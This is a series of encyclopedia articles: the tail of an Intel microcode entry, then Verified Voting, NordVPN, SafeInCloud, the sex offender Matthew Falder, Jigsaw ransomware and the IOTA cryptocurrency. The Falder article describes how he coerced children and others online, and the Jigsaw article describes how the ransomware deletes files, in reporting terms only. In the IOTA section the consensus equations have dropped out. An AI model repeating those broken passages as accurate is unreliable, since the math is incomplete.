testing of individual CPUs prior to sale. In May 2020, a script reading directly from the Control Register Bus (CRBUS) (after exploiting "Red Unlock" in JTAG USB-A to USB-A 3.0 with Debugging Capabilities, without D+, D- and Vcc) was used to read from the Local Direct Access Test (LDAT) port of the Intel Goldmont CPU and the loaded microcode and patch arrays were read. These arrays are only accessible after the CPU has been put into a specific mode, and consist of five arrays accessed through offset 0x6a0: References Further reading "the first in a REP swing operation loads the Loop Counter with the number of iterations remaining after the unrolled iterations are executed. … a small number of iterations (e.g., seven), are sent during the time it takes for the Loop Counter in the MS to be loaded. This unrolled code is executed conditionally based on the value of (E)CX … remaining three iterations are turned into NOPS." "… control returns to the Micro-operation Sequence (MS) unit to issue further error correction Control micro-operations (Cuops). In order to simplify restart, the Cuops originating from the error-causing macroinstruction supplied by the translate programmable logic arrays (XLAT PLAs) are loaded into the Cuop registers, with their valid bits unasserted." "ADD, XOR, SUB, AND, and OR, which are implemented with one generic Cuop. Another group of instructions representable by only one includes and "SYSENTER and SYSEXIT are assembly-language instructions that may be executed on an Intel architecture processor, such as the Pentium Pro processor … micro-operation is determined to be ready when its source fields have been filled with appropriate data … instruction decode unit comprises one or more translate (XLAT) programmable logic arrays (PLAs) that decode each instruction in to one or more micro-operations. … SYSENTER and SYSEXIT instructions are decoded in to micro-operations that perform the steps illustrated in FIGS. 5 and 6, respectively." External links uCodeDisasm — Intel microcode disassembler in Python (from CRBUS), names of uops Microcode, Intel Microcode, Intel
56390981
https://en.wikipedia.org/wiki/Verified%20Voting%20Foundation
Verified Voting Foundation
The Verified Voting Foundation is a non-governmental, nonpartisan organization founded in 2004 by David L. Dill, a computer scientist from Stanford University, focused on how technology impacts the administration of US elections. The organization’s mission is to “strengthen democracy for all voters by promoting the responsible use of technology in elections.” Verified Voting works with election officials, elected leaders, and other policymakers who are responsible for managing local and state election systems to mitigate the risks associated with novel voting technologies. History Foundation David L. Dill's research involves "circuit verification and synthesis and in verification methods for hard real-time systems". Part of this work has required him to testify on "electronic voting before the U.S. Senate and the Commission on Federal Election Reform". These interests ultimately led him to establishing the Verified Voting Foundation in 2003. Activities Partnerships and lobbying efforts Verified Voting partners with an array of organizations and coalitions to help coordinate post-election audits, tabletop exercises, and election protection work on a state and local level. The organization works closely with the Brennan Center for Justice and Common Cause; in 2020 the organizations advocated together for election best practices, such as paper ballots and adequate election security funding, in key swing states. Verified Voting also co-chaired the Election Protection Election Security Working Group during the 2020 election cycle, helping to monitor and respond to state-specific election security issues. Verified Voting participates in several coalitions, including the Secure Our Vote Coalition and the National Task Force on Election Crises. Secure Our Vote helped to successfully block legislation permitting internet voting in Puerto Rico (see below for Verified Voting’s stance on internet voting). Verified Voting’s work with the National Task Force on Election Crises supported the Task Force’s mission to develop responses to potential election crises in 2020 and guarantee a peaceful transfer of power. Verified Voting also coordinates with its partners to advocate both federal and state governments for election security. The Foundation conducts this lobbying work as part of its 501(c)4 arm. At the federal level, the organization meets with lawmakers, sends letters, and issues statements to support “federal election security provisions that provide states and local jurisdictions with the funding and assistance they need to implement best practices like paper ballots and RLAs.” The organization also advocates in specific states, employing a “targeted approach” that seeks to address the specific election security and voter integrity issues facing a particular state. In 2020, for instance, the organization worked in Virginia to increase safe voting options amidst the pandemic, successfully advocated against internet voting legislation in New Jersey, and provided advice on RLA regulation to officials in California and Oregon. The Verifier Tool Since 2004, Verified Voting has been collecting data on the nation’s voting machines and making it available through a web-based interactive tool called “the Verifier.” The Verifier is the most comprehensive publicly available set of data related to voting equipment usage in the United States. For each federal election cycle, the Verifier documents the specific voting equipment in use in every jurisdiction across the country. The Verifier is used by election officials, academics, organizations, the news-media, and general public as a source of information about voting technology. Since its inception, the Verifier has supported a number of initiatives including national election protection operations, state advocacy, policy making, reporting, and congressional research inquiries. To maintain the database, Verified Voting liaises with election officials, monitors local news stories, and researches certification documents. The Verifier is a critical aspect of Verified Voting's organizational infrastructure and supports the responsible use of technology in elections. Stances Stance on paper ballots Verified Voting advocates for the use of voter-verified paper ballots that “create tangible and auditable records of votes cast in an election.” Paper trails generated by voter-verified paper ballots “provide a reliable way to check that the computers were not compromised (whether through human error or malfeasance),” an important point given that 99% of all ballots cast in the United States are counted by a computer. Verified Voting advises state and local jurisdictions to help them “implement best practices for election security.” The organization advocates that election officials avoid using electronic voting systems which do not provide a paper trail. Verified Voting plays a leading role in providing states and localities with the information, expertise, and advice needed to make informed decisions about the voting equipment they use and purchase. In 2019 and 2020, the organization offered feedback on the adoption of new voting machines in California, New York, Florida, North Carolina, Pennsylvania, as well as other states, advocating in all instances for the use of voter-verified paper ballots. Stance on internet voting Verified Voting works diligently to highlight risks of online voting and recommends that state and local governments avoid adopting these technologies. The organization argues that elections held online would be “easy targets for attackers.” Online voting, which includes voting on a mobile app, lacks the capacity to generate a voter-verified paper record and cannot protect a voter’s privacy or the integrity of their ballot. Verified Voting notes that unlike other online services, election manipulation is difficult to catch because ballot secrecy prevents voters from seeing their ballots after they have submitted them, which also prevents voters from determining if their votes have been digitally altered or not. A 2016 report co-authored by the organization concluded that “as states permit the marking and transmitting of marked ballots over the Internet, the right to a secret ballot is eroded and the integrity of our elections is put at risk.” The organization notes that with mobile voting, there is no way to determine the security of “the actual device that voters cast their votes on...The voter’s device may already be corrupted with malware or viruses that could interfere with ballot transmission or even spread that malware to the computer at the elections office on the receiving end of the online ballot.” Online technologies that rely on blockchain technology faces a similar challenge: Verified Voting argues that while “blockchain technology is designed to keep information secure once it is received,” such technology “cannot defend against the multitude of threats to that information before it is entered in the blockchain.” Moreover, blockchain technology prevents voters from anonymously verifying their ballot, and presents risks to “ballot secrecy if encryption keys are not properly protected or software errors allow decryption of individual ballots.” Post-Election Audits and Risk-Limiting Audits Verified Voting advises state and local governments to pilot and implement and post-election audits and risk-limiting audits (RLAs). Post-election tabulation audits routinely check voting system performance. These audits are designed to check the accuracy of a certain tabulation--not the general results of an election. Risk-limiting audits, meanwhile “provide reason to trust that the final outcome matches the ballots.” RLAs accomplish this by checking a “random sample of voter-verifiable paper ballots, seeking evidence that the reported election outcome was correct, if it was.” In this context, the 'correct' outcome is what a full hand count of the ballots would reveal. Since RLAs continue checking random samples until there is convincing evidence that the outcome is correct, “contests with wide margins can be audited with very few ballots, freeing up resources for auditing closer contests, which generally require checking more ballots.” RLAs can also trigger full hand recounts if the audit results do not support the reported election outcome. In order to facilitate the implementation of RLAs, Verified Voting designs pilot audits and post-election audits in conjunction with specific state and local governments, and has conducted studies in Rhode Island, Orange County (CA), and Fairfax (VA). These studies have helped lead to the implementation of RLAs and audit legislation in several states. The organization advocates for robust, post-election audits and also maintains an online, publicly-accessible database of all state election audit laws. References 501(c)(3) organizations Election and voting-related organizations based in the United States
56428874
https://en.wikipedia.org/wiki/NordVPN
NordVPN
NordVPN is a VPN service with applications for Windows, macOS, Linux, Android, iOS, and Android TV. Manual setup is available for wireless routers, NAS devices and other platforms. NordVPN is developed by Nord Security, a company that creates cybersecurity software and was initially supported by the Lithuanian startup accelerator and business incubator Tesonet. NordVPN operates under the jurisdiction of Panama, as the country has no mandatory data retention laws and does not participate in the Five Eyes or Fourteen Eyes intelligence sharing alliances. Its offices are located in Lithuania, the United Kingdom, Panama and the Netherlands. History NordVPN was established in 2012 by a group of childhood friends which included Tom Okman. Late in May 2016, it presented an Android app, followed by an iOS app in June the same year. In October 2017, it launched a browser extension for Google Chrome. In June 2018, the service launched an application for Android TV. As of June 2021, NordVPN was operating 5,600 servers in 59 countries. In March 2019, it was reported that NordVPN received a directive from Russian authorities to join a state-sponsored registry of banned websites, which would prevent Russian NordVPN users from circumventing state censorship. NordVPN was reportedly given one month to comply, or face blocking by Russian authorities. The provider declined to comply with the request and shut down its Russian servers on April 1. As a result, NordVPN still operates in Russia, but its Russian users have no access to local servers. In September 2019, NordVPN announced NordVPN Teams, a VPN solution aimed at small and medium businesses, remote teams and freelancers, who need secure access to work resources. Two years later, NordVPN Teams rebranded as NordLayer and moved towards SASE business solutions. The press sources quoted the market rise in SASE technology as one of the key factors in the rebrand. On October 29, 2019, NordVPN announced additional audits and a public bug bounty program. The bug bounty was launched in December 2019, offering researchers monetary rewards for reporting critical flaws in the service. In December 2019, NordVPN became one of the five founding members of the newly formed 'VPN Trust Initiative', promising to promote online security as well as more self-regulation and transparency in the industry. In 2020, the initiative announced 5 key areas of focus: security, privacy, advertising practices, disclosure and transparency, and social responsibility. In August 2020, Troy Hunt, an Australian web security expert and founder of Have I Been Pwned?, announced a partnership with NordVPN as a strategic advisor. On his blog, Hunt described this role as "work with NordVPN on their tools and messaging with a view to helping them make a great product even better." In October 2020, NordVPN started rolling out its first colocated servers in Finland to secure the hardware perimeter. The RAM-based servers are fully owned and operated by NordVPN in an attempt to keep full control. Technology NordVPN routes all users' internet traffic through a remote server run by the service, thereby hiding their IP address and encrypting all incoming and outgoing data. For encryption, NordVPN has been using the OpenVPN and Internet Key Exchange v2/IPsec technologies in its applications and also introduced its proprietary NordLynx technology in 2019. NordLynx is a VPN tool based on the WireGuard protocol, which aims for better performance than the IPsec and OpenVPN tunneling protocols. According to tests performed by Wired UK, NordLynx produces "speed boosts of hundreds of MB/s under some conditions." In April 2020, NordVPN announced a gradual roll-out of the WireGuard-based NordLynx protocol on all its platforms. The wider implementation was preceded by a total of 256,886 tests, which included 47 virtual machines on nine different providers, in 19 cities, and eight countries. The tests showed higher average download and upload speeds than both OpenVPN and IKEv2. At one time NordVPN also used L2TP/IPSec and Point-to-Point Tunneling Protocol (PPTP) connections for routers, but these were later removed, as they were largely outdated and insecure. NordVPN has desktop applications for Windows, macOS, and Linux, as well as mobile apps for Android and iOS and Android TV app. Subscribers also get access to encrypted proxy extensions for Chrome and Firefox browsers. Subscribers can connect up to six devices simultaneously. In November 2018, NordVPN claimed that its no-log policy was verified through an audit by PricewaterhouseCoopers AG. In 2020, NordVPN underwent a second security audit by PricewaterhouseCoopers AG. The testing focused on NordVPN’s Standard VPN, Double VPN, Obfuscated (XOR) VPN, P2P servers, and the product’s central infrastructure. The audit confirmed that the company’s privacy policy was upheld and the no-logging policy was true again. In 2021, NordVPN completed an application security audit, carried out by a security research group VerSprite. VerSprite performed penetration testing and, according to the company, found no critical vulnerabilities. One flaw and a few bugs that were found in the audit have since been patched. In December 2020, NordVPN started a network-wide rollout of 10 Gbit/s servers, upgrading from the earlier 1 Gbit/s standard. The company's servers in Amsterdam and Tokyo were the first to support 10 Gbit/s, and by December 21, 2020, over 20% of the company's network had been upgraded. In January 2022, NordVPN released an open-source VPN speed testing tool, available for download from GitHub. Additional features Besides general-use VPN servers, the provider offers servers for specific purposes, including P2P sharing, double encryption, and connection to the Tor anonymity network. NordVPN offers three subscription plans: monthly, yearly and bi-yearly. NordVPN also develops CyberSec for Windows, macOS, and Linux platforms, a security feature that works as an ad-blocker and also automatically blocks websites known for hosting malware. In November 2020, NordVPN launched a feature that scans the dark web to determine if a user's personal credentials have been exposed. When the Dark Web Monitor feature finds any leaked credentials, it sends a real-time alert, prompting the user to change the affected passwords. Research In 2021, NordVPN conducted a study on digital literacy, surveying 48,063 respondents from 192 countries on their digital habits and rating their knowledge on the scale from 1 to 100. Germany topped the list, followed by the Netherlands and Switzerland. The overall global score was 65.2/100. In July 2021, NordVPN released a report outlining the proliferation of smart devices and consumer sentiment regarding their security. The poll of 7000 people revealed that while 95% of people in the UK had some kind of an IoT device in their household, almost a fifth took no measures to protect them. Similar responses were found in respondents from other countries as well. The same year, NordVPN released a report about device sharing in workplace. The study found that managers are five times more likely to share their work devices than their employees. NordVPN also conducted a study on the time people spend online. In a survey of 2,000 adults in the UK, NordVPN found that, on average, British people spend 59 hours online per week, which amounts to 22 years per lifetime. Social responsibility NordVPN has supported various social causes, including cybercrime prevention, education, internet freedom, and digital rights. NordVPN offers emergency VPN services for activists and journalists in regimes that censor internet freedom. In 2020, NordVPN reported having donated over 470 emergency VPN accounts to citizens and NGOs from Hong Kong and given out additional 1,150 VPN licenses to various organizations. In 2020, NordVPN supported the Internet Freedom Festival, a project promoting digital human rights and internet freedom. NordVPN also sponsors the Cybercrime Support Network, a non-profit organization that assists people and companies affected by cybercrime. In response to the COVID-19 pandemic, NordVPN’s parent company Nord Security offered free online security tools (NordVPN, NordPass, and NordLocker) to affected nonprofit organizations, content creators, and educators. In 2021, NordVPN proposed the International VPN Day, a day to bring attention to people's right to digital privacy, security, and freedom. It is proposed to be annually observed on August 19. Its primary goal is to raise awareness about cybersecurity best practices and educate internet users about the importance of online privacy tools and cybersecurity in general. Reception In a positive review published by Tom's Guide in October 2019, the reviewer concluded that "NordVPN is affordable and offers all the features that even the hardcore VPN elitists will find suitable". The reviewer also noted that its terms of service mention no country of jurisdiction, writing that the company could be more transparent about its ownership. In a February 2019 review by PC Magazine, NordVPN was praised for its strong security features and an "enormous network of servers", although its price tag was noted as expensive. In a later review by the same magazine, NordVPN was again praised extra features, rarely found in other VPNs, its WireGuard protocol, large selection of servers, and strong security practices. Despite winning the outlet’s Editor’s Choice award, NordVPN was still noted as expensive. CNET's September 2021 review favorably noted NordVPN's SmartPlay feature, obfuscated servers, and security efforts. While CNET praised NordVPN’s user-friendly interface, it noted that the map’s design could be improved. TechRadar recommended NordVPN for its security and recent enhancements. It also noted that NordVPN worked well in countries with Internet censorship, including the Great Firewall in China. In 2021, a favorable review by Wired noted that NordVPN’s price has become more affordable and concluded that “NordVPN is the fastest jack-of-all-trades VPN provider right now.” However, the article also noted that there are still cheaper VPN options available. Awards In 2019, NordVPN won the ‘Best Overall’ category in ProPrivacy.com VPN Awards. In 2020, NordVPN won in German CHIP magazine’s ‘Best security of the VPN services’ category. In September 2021, NordVPN won CNET’s ‘Best VPN for reliability and security’ award in its annual ‘Best VPN service’ awards. Criticism On October 21, 2019, a security researcher disclosed on Twitter a server breach of NordVPN involving a leaked private key. The cyberattack granted the attackers root access, which was used to generate an HTTPS certificate that enabled the attackers to perform man-in-the-middle attacks to intercept the communications of NordVPN users. In response, NordVPN confirmed that one of its servers based in Finland was breached in March 2018, but there was no evidence of an actual man-in-the-middle attack ever taking place. The exploit was the result of a vulnerability in a contracted data center's remote administration system that affected the Finland server between January 31 and March 20, 2018. According to NordVPN, the data center disclosed the breach to NordVPN on April 13, 2019, and NordVPN ended its relationship with the data center. Security researchers and media outlets criticized NordVPN for failing to promptly disclose the breach after the company became aware of it. NordVPN stated that the company initially planned to disclose the breach after it completed the audit of its 5,000 servers for any similar risks. On November 1, 2019, in a separate incident, it was reported that approximately 2,000 usernames and passwords of NordVPN accounts were exposed through credential stuffing. See also Comparison of virtual private network services Encryption Internet freedom in Panama Internet privacy Secure communication References External links Virtual private network services Internet security Internet privacy Internet privacy software Internet properties established in 2012 Telecommunications companies of Panama YouTube sponsors
56481093
https://en.wikipedia.org/wiki/SafeInCloud
SafeInCloud
SafeInCloud is a proprietary password manager to securely store passwords and other credentials offline and in the cloud. It is similar to Enpass which has the same functionality. Features One master password Everything is encrypted locally Cloud synchronization to Google Drive, Dropbox, OneDrive and WebDAV Cross browser and platform support Strong password generation Password encryption AutoFill Passwords with the help of browser extensions Portable access See also Comparison of password managers References External links Software that uses Qt Password managers Cross-platform software IOS software Android (operating system) software Universal Windows Platform apps MacOS software
56608341
https://en.wikipedia.org/wiki/Matthew%20Falder
Matthew Falder
Matthew Alexander Falder (born 24 October 1988) is a convicted English serial sex offender and blackmailer who coerced his victims online into sending him degrading images of themselves or into committing crimes against a third person such as rape or assault. He managed this by making threats to the victim by saying he would send their family or friends degrading info or revealing pictures of them (which he usually obtained earlier by obtaining a false trust with the victim) if they did not comply with his commands. Falder hid behind anonymous accounts on the web and then re-posted the images to gain a higher status on the dark web. Investigators said that he "revelled" in getting images to share on hurtcore websites. The National Crime Agency (NCA), described him as "one of the most prolific and depraved offenders they had ever encountered." Falder pleaded guilty to 137 charges from 46 complainants, making him one of the UK's most prolific convicted sex offenders. In February 2018 he was jailed for 32 years and ordered to serve a further six years on extended licence. The Court of Appeal later reduced the term of imprisonment to 25 years, with an extended licence of 8 years. Early life and career Falder grew up in Knutsford, Cheshire. He attended Kings School in Macclesfield, Cheshire, where it was reported that he had "excelled". After school he attended Clare College of the University of Cambridge, specialising in seismic oceanography and earning masters and doctoral degrees. At the time of his arrest, he was working as a post-doctoral researcher and lecturer in geophysics at the University of Birmingham. Falder was well-liked in his peer group, and was described as being extroverted, funny and larger than life. Sexual offences Falders' offending was detected as long ago as 2009. He did not meet any of his victims; all of his crimes were committed using the dark web. Falder manipulated young children to photograph themselves in compromising positions and then offered the images online. In April 2015, the NCA discovered someone posting to the hurtcore websites under the name "666devil", who later turned out to be Falder. NCA officers arrested Falder in his office at his place of work on 21 June 2017. When they read out a list of the offences he was suspected of committing, Falder remarked that it sounded "like the rap sheet from hell". Falder's victims numbered over 50, and it took over 30 minutes to read out the charges to him at Birmingham Crown Court. Originally charged with 188 offences, he pleaded not guilty to 51 of them; the prosecution accepted this, but they were ordered to remain on file. Falder used various accounts on several websites to pose as a young girl or woman named 'Liz'. On the dark web Falder used names such as 'inthegarden', '666devil' and 'evilmind'. Falder had seventy different online identities. He lured people into taking photographs of themselves in humiliating situations. He blackmailed one person into raping a four-year-old child. Falder engaged in hurtcore, which police have characterised as manipulating others into performing acts of "rape, murder, sadism, torture, paedophilia, blackmail, humiliation and degradation". One of Falder's victims was just 14 years old; Falder said online he would willingly “mentally fuck her up” and added, “I am not sure I care if she lives or dies.” Falder increased the pressure on his victims, at least four of whom attempted suicide. When one of his victims pleaded for the abuse to end or else they would kill themselves, Falder replied that the images he already had on them would be circulated on the Internet anyway. Falder maintained he could not be caught and said he did not care if the victims lived or died. In addition to the National Crime Agency (NCA), the investigation to uncover his identity involved GCHQ, US Homeland Security, Europol, Australian Federal Police, New Zealand Police, and the Israel Police; it lasted four years. Will Kerr of the NCA feels tech companies gave less than ideal cooperation with the police during the enquiry. Kerr maintains accounts were closed down possibly preventing police identifying other victims and identifying patterns of offending. Kerr fears this may have delayed identifying offenders and Kerr wants government action to make tech companies cooperate better in future. The NCA detailed crimes such as blackmailing people into eating faeces, licking toilet seats and tampons and persuading people to eat dog food. They described him as "one of the most prolific and depraved offenders they had ever encountered". On 16 October 2017, Falder pleaded guilty to 137 offences against 46 victims, making him one of the most prolific sex offenders in British history. At Birmingham Crown Court on 19 February 2018, Judge Philip Parker sentenced Falder to 32 years in prison, and ordered him to serve a further 6 years on extended licence after his release. Falder will not be eligible for parole until he is at least 50 years old. If the Parole Board believes that Falder continues to pose a danger to the public or to children, he may have to serve the full 32 years in prison. The judge at the sentencing hearing described Falder as an "internet highwayman" who was "warped and sadistic" and whose behaviour was "cunning, persistent, manipulative and cruel." After sentencing, investigators released footage of his arrest and described how Falder "revelled" in the anguish and pain that he had caused. Ruona Iguyovwe, of the CPS, said, “Matthew Falder is a highly manipulative individual who clearly enjoyed humiliating his many victims and the impact of his offending in this case has been significant. He deliberately targeted young and vulnerable victims. At least three victims are known to have attempted suicide and some others have inflicted self-harm. There was a high degree of sophistication and significant planning by Falder due to his use of encryption software and technology in his electronic communication and the use of multiple fake online identities and encrypted email addresses.” Prosecutors stated Falder lived a double life, a graduate of Cambridge University and Birmingham University researcher during the day and a sexual predator at night. Police officer Matt Sutton said, ‘In more than 30 years of law enforcement I’ve never come across an offender whose sole motivation was to inflict such profound anguish and pain. Matthew Falder revelled in it. I’ve also never known such an extremely complex investigation with an offender who was technologically savvy and able to stay hidden in the darkest recesses of the dark web. This investigation represents a watershed moment. Falder is not alone so we will continue to develop and deliver our capabilities nationally for the whole law enforcement system to stop offenders like him from wrecking innocent lives. I commend the victims for their bravery and I urge anyone who is being abused online to report it. There is help available.’ Javed Khan of Barnardo's stated, "This [32-year prison] sentence sends a message to paedophiles that they will pay for their crimes while, hopefully giving other child abuse victims the confidence to come forward and seek justice. (...) Barnardo’s wants to encourage parents to talk to their children about the potential dangers online and know what new apps they’re using and which websites they’re visiting, so they can help keep them safe. Barnardo’s also wants tech companies to sign up to an online code of practice to protect children, incorporate safety features when designing products and take action as soon as abuse becomes flagged. Children and young people need to know how to report abuse through age appropriate relationships and sex education." Falder appealed against his sentence. On 16 October 2018, the Court of Appeal reduced the term of imprisonment to 25 years, with an extended licence of 8 years. A spokesperson for the University of Birmingham said, "The University is shocked to hear of the abhorrent crimes committed by a former post-doctoral researcher.” The University of Cambridge stated after the sentencing that they were "actively pursuing" ways of stripping Falder of his academic qualifications. The university could not say if there was a precedent of a removal process for its alumni. See also Sextortion Peter Scully References External links Falder's arrest video by the police No hiding place on dark web for criminals 1988 births Living people 21st-century English criminals Alumni of Clare College, Cambridge Academics of the University of Birmingham Criminals from Manchester Dark web English geophysicists English male criminals English people convicted of child sexual abuse English sex offenders People from Knutsford People educated at The King's School, Macclesfield Prisoners and detainees of England and Wales
56637698
https://en.wikipedia.org/wiki/Jigsaw%20%28ransomware%29
Jigsaw (ransomware)
Jigsaw is a form of encrypting ransomware malware created in 2016. It was initially titled "BitcoinBlackmailer" but later came to be known as Jigsaw due to featuring an image of Billy the Puppet from the Saw film franchise. The malware encrypts computer files and gradually deletes them unless a ransom is paid to decrypt the files. History Jigsaw was designed in April 2016 and released a week after creation. It was designed to be spread through malicious attachments in spam emails. Jigsaw is activated if a user downloads the malware programme which will encrypt all user files and master boot record. Following this, a popup featuring Billy the Puppet will appear with the ransom demand in the style of Saw's Jigsaw (one version including the "I want to play a game" line from the franchise) for Bitcoin in exchange for decrypting the files. If the ransom is not paid within one hour, one file will be deleted. Following this for each hour without a ransom payment, the amount of files deleted is exponentially increased each time from a few hundred to thousands of files until the computer is wiped after 72 hours. Any attempt to reboot the computer or terminate the process will result in 1,000 files being deleted. A further updated version also makes threats to dox the victim by revealing their personal information online. Jigsaw activates purporting to be either Firefox or Dropbox in task manager. As the code for Jigsaw was written within the .NET Framework, it can be reverse engineered to remove the encryption without paying the ransom. Reception The Register wrote that "Using horror movie images and references to cause distress in the victim is a new low." In 2017, it was listed among 60 versions of ransomware that utilised evasive tactics in its activation. References 2016 in computing Ransomware Saw (franchise)
56694947
https://en.wikipedia.org/wiki/IOTA%20%28technology%29
IOTA (technology)
IOTA is an open-source distributed ledger and cryptocurrency designed for the Internet of things (IoT). It uses a directed acyclic graph to store transactions on its ledger, motivated by a potentially higher scalability over blockchain based distributed ledgers. IOTA does not use miners to validate transactions, instead, nodes that issue a new transaction on the network must approve two previous transactions. Transactions can therefore be issued without fees, facilitating microtransactions. The network currently achieves consensus through a coordinator node, operated by the IOTA Foundation. As the coordinator is a single point of failure, the network is currently centralized. IOTA has been criticized due to its unusual design, of which it is unclear whether it will work in practice. As a result, IOTA was rewritten from the ground up for a network update called Chrysalis, or IOTA 1.5, which launched on 28 April 2021. In this update, controversial decisions such as ternary encoding and quantum proof cryptography were left behind and replaced with established standards. A testnet for a follow-up update called Coordicide, or IOTA 2.0, was deployed in late 2020, with the aim of releasing a distributed network that no longer relies on the coordinator for consensus in 2021. History The value transfer protocol IOTA, named after the smallest letter of the Greek alphabet, was created in 2015 by David Sønstebø, Dominik Schiener, Sergey Ivancheglo, and Serguei Popov. Initial development was funded by an online public crowdsale, with the participants buying the IOTA value token with other digital currencies. Approximately 1300 BTC were raised, corresponding to approximately US$500,000 at that time, and the total token supply was distributed pro-rata over the initial investors. The IOTA network went live in 2016. IOTA foundation In 2017, early IOTA token investors donated 5% of the total token supply for continued development and to endow what became later became the IOTA Foundation. In 2018, the IOTA Foundation was chartered as a Stiftung in Berlin, with the goal to assist in the research and development, education and standardisation of IOTA technology. The IOTA Foundation is a board member of International Association for Trusted Blockchain Applications (INATBA), and founding member of the Trusted IoT Alliance and Mobility Open Blockchain Initiative (MOBI), to promote blockchain and distributed ledgers in regulatory approaches, the IoT ecosystem and mobility. Following a dispute between IOTA founders David Sønstebø and Sergey Ivancheglo, Ivancheglo resigned from the board of directors on 23 June 2019. On 10 December 2020 the IOTA Foundation Board of Directors and supervisory board announced that the Foundation officially parted ways with David Sønstebø. DCI vulnerability disclosure On 8 September 2017, researchers Ethan Heilman from Boston University and Neha Nerula et al. from MIT's Digital Currency Initiative (DCI) reported on potential security flaws with IOTA's former Curl-P-27 hash function. The IOTA Foundation received considerable backlash in their handling of the incident. FT Alphaville reported legal posturing by an IOTA Founder against a security researcher for his involvement in the DCI report, as well as instances of aggressive language levelled against a Forbes contributor and other unnamed journalists covering the DCI report. The Center for Blockchain Technologies at the University College London severed ties with the IOTA Foundation due to legal threats against security researchers involved in the report. Attacks As a speculative blockchain and cryptocurrency-related technology, IOTA has been the target of phishing, scamming, and hacking attempts, which have resulted in the thefts of user tokens and extended periods of downtime. In January 2018, more than US$10 million worth of IOTA tokens were stolen from users that used a malicious online seed-creator, a password that protects their ownership of IOTA tokens. The seed-generator scam was the largest fraud in IOTA history to date, with over 85 victims. In January 2019, the UK and German law enforcement agencies arrested a 36-year-old man from Oxford, England believed to be behind the theft. On 26 November 2019 a hacker discovered a vulnerability in a third-party payment service, provided by MoonPay, integrated in the mobile and desktop wallet managed by the IOTA Foundation. The attacker compromised over 50 IOTA seeds, resulting in the theft of approximately US$2 Million worth in IOTA tokens. After receiving reports that hackers were stealing funds from user wallets, the IOTA Foundation shut down the coordinator on 12 February 2020. This had the side-effect of effectively shutting down the entire IOTA cryptocurrency. Users at-risk were given seven days to migrate their potentially compromised seed to a new seed, until 7 March 2020. The coordinator was restarted on 10 March 2020. IOTA 1.5 (Chrysalis) and IOTA 2.0 (Coordicide) The IOTA network is currently centralized, a transaction on the network is considered valid if and only if it is referenced by a milestone issued by a node operated by the IOTA foundation called the coordinator. In 2019 the IOTA Foundation announced that it would like to operate the network without a coordinator in the future, using a two-stage network update, termed Chrysalis for IOTA 1.5 and Coordicide for IOTA 2.0. The Chrysalis update went live on 28 April 2021, and removed its controversial design choices such as ternary encoding and Winternitz one-time signatures, to create an enterprise-ready blockchain solution. In parallel Coordicide is currently developed, to create a distributed network that no longer relies on the coordinator for consensus. A testnet of Coordicide was deployed late 2020, with the aim of releasing a final version in 2021. Characteristics The Tangle The Tangle is the moniker used to describe IOTAs directed acyclic graph (DAG) transaction settlement and data integrity layer. It is structured as a string of individual transactions that are interlinked to each other and stored through a network of node participants. The Tangle does not have miners validating transactions, rather, network participants are jointly responsible for transaction validation, and must confirm two transactions already submitted to the network for every one transaction they issue. Transactions can therefore be issued to the network at no cost, facilitating micropayments. To avoid spam, every transaction requires computational resources based on Proof of Work (PoW) algorithms, to find the answer to a simple cryptographic puzzle. IOTA supports both value and data transfers. A second layer protocol provides encryption and authentication of messages, or data streams, transmitted and stored on the Tangle as zero-value transactions. Each message holds a reference to the address of a follow-up message, connecting the messages in a data stream, and providing forward secrecy. Authorised parties with the correct decryption key can therefore only follow a datastream from their point of entry. When the owner of the data stream wants to revoke access, it can change the decryption key when publishing a new message. This provides the owner granular controls over the way in which data is exchanged to authorised parties. IOTA token The IOTA token is a unit of value in the IOTA network. There is a fixed supply of 2,779,530,283,277,761 IOTA tokens in circulation on the IOTA network. IOTA tokens are stored in IOTA wallets protected by an 81-character seed, similar to a password. To access and spend the tokens, IOTA provides a cryptocurrency wallet. A hardware wallet can be used to keep credentials offline while facilitating transactions. As of 8 December 2021, each IOTA token has a value of $1.17, giving the cryptocurrency a market capitalisation of $3.26bn, according to CoinMarketCap data. Coordinator node IOTA currently requires a majority of honest actors to prevent network attacks. However, as the concept of mining does not exist on the IOTA network, it is unlikely that this requirement will always be met. Therefore, consensus is currently obtained through referencing of transactions issued by a special node operated by the IOTA foundation, called the coordinator. The coordinator issues zero value transactions at given time intervals, called milestones. Any transaction, directly or indirectly, referenced by such a milestone is considered valid by the nodes in the network. The coordinator is an authority operated by the IOTA foundation and as such single point of failure for the IOTA network, which makes the network centralized. Markets IOTA is traded in megaIOTA units (1,000,000 IOTA) on digital currency exchanges such as Bitfinex, and listed under the MIOTA ticker symbol. Like other digital currencies, IOTA's token value has soared and fallen. Fast Probabilistic Consensus (FPC) The crux of cryptocurrencies is to stop double spends, the ability to spend the same money twice in two simultaneous transactions. Bitcoin's solution has been to use Proof of Work (PoW) making it a significant financial burden to have a minted block be rejected for a double spend. IOTA has designed a voting algorithm called Fast Probabilistic Consensus to form a consensus on double spends. Instead of starting from scratch, the IOTA Foundation started with Simple Majority Consensus where the first opinion update is defined by, Where is the opinion of node at time . The function is the percent of all the nodes that have the opinion and is the threshold for majority, set by the implementation. After the first round, the successive opinions change at time to the function, Although, this model is fragile against malicious attackers which is why the IOTA Foundation decided not to use it. Instead the IOTA Foundation decided to augment the leaderless consensus mechanism called, Random neighbors majority consensus (RMC) which is similar to SMC although, the nodes in which their opinions are queries is randomized. They took RMC then augmented it to create FPC by having the threshold of majority be a random number generated from a Decentralized Random Number Generator (dRNG). For FPC, the first sound is the same, For success rounds though, Where where , is a randomized threshold for majority. Randomizing the threshold for majority makes it extremely difficult for adversaries to manipulate the consensus by either making it converge to a specific value or prolonging consensus. Note that FPC is only utilized to form consensus on a transaction during a double spend. Ultimately, IOTA uses Fast Probabilistic Consensus for consensus and uses Proof of Work as a rate controller. Because IOTA does not use PoW for consensus, its overall network and energy per transaction is extremely small. Applications and testbeds Proof-of-concepts building on IOTA technology are being developed in the automotive and IoT industry by corporates as Jaguar Land Rover, STMicroelectronics and Bosch. IOTA is a participant in smart city testbeds, to establish digital identity, waste management and local trade of energy. In project Alvarium, formed under the Linux Foundation, IOTA is used as an immutable storage and validation mechanism. The privacy centered search engine Xayn uses IOTA as a trust anchor for its aggregated AI model. On 11 February 2020, the Eclipse Foundation and IOTA Foundation jointly launched the Tangle EE (Enterprise Edition) Working Group. Tangle EE is aimed at enterprise users that can take IOTA technology and enable larger organizations to build applications on top of the project, where the Eclipse Foundation will provide a vendor-neutral governance framework . Announcements of partners were critically received. 